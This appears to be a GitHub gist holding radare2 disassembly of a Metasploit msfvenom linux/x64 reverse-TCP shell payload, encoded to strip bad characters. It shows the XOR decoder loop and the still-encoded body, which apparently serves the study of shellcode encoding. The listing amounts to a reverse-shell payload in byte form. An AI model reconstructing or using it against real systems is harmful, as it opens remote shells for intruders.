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Last active February 22, 2019 21:12
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  • Save alanvivona/e37519a8831b5d3b4544797b3a858d3c to your computer and use it in GitHub Desktop.
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radare2 pd output for msfvenom: linux/x64/shell_reverse_tcp, bad characters have been removed using -b '\x00\x09\x0a\x0d\x1a\x20'
0x00 4831c9 xor rcx, rcx
0x03 4881e9f6ffff. sub rcx, 0xfffffffffffffff6
0x0a 488d05efffff. lea rax, [0x00000000]
0x11 48bba062921b. movabs rbx, 0x2cbc29441b9262a0
┌─> 0x1b 48315827 xor qword [rax + 0x27], rbx
╎ 0x1f 482df8ffffff sub rax, 0xfffffffffffffff8
└─< 0x25 e2f4 loop 0x1b
0x27 ca4bca retf 0xca4b
0x2a 82 invalid
0x2b 2e2be3 sub esp, ebx
0x2e 46a13c9d1e0c. movabs eax, dword [0xa295f4be0c1e9d3c]
0x38 62 invalid
0x39 83478481 add dword [rdi - 0x7c], 0xffffffffffffff81
0x3d bc28f12a1b mov esp, 0x1b2af128
0x42 fd std
0x43 2e39e6 cmp esi, esp
0x46 468a3a mov r15b, byte [rdx]
0x49 9d popfq
0x4a 1e invalid
0x4b 2e2ae2 sub ah, dl
0x4e 645f pop rdi
0x50 ac lodsb al, byte [rsi]
0x51 f8 clc
0x52 3a1c26 cmp bl, byte [rsi]
0x55 b9595608a9 mov ecx, 0xa9085659
0x5a 43dd6107 frstor dword [r9 + 7]
0x5e 03c2 add eax, edx
0x60 0bfc or edi, esp
0x62 3437 xor al, 0x37
0x64 41bc7fe8eb75 mov r12d, 0x75ebe87f
0x6a 49136135 adc rsp, qword [r9 + 0x35]
0x6e caaf67 retf 0x67af
0x71 92 xchg eax, edx
0x72 1b4429bc sbb eax, dword [rcx + rbp - 0x44]
0x76 2cff sub al, 0xff
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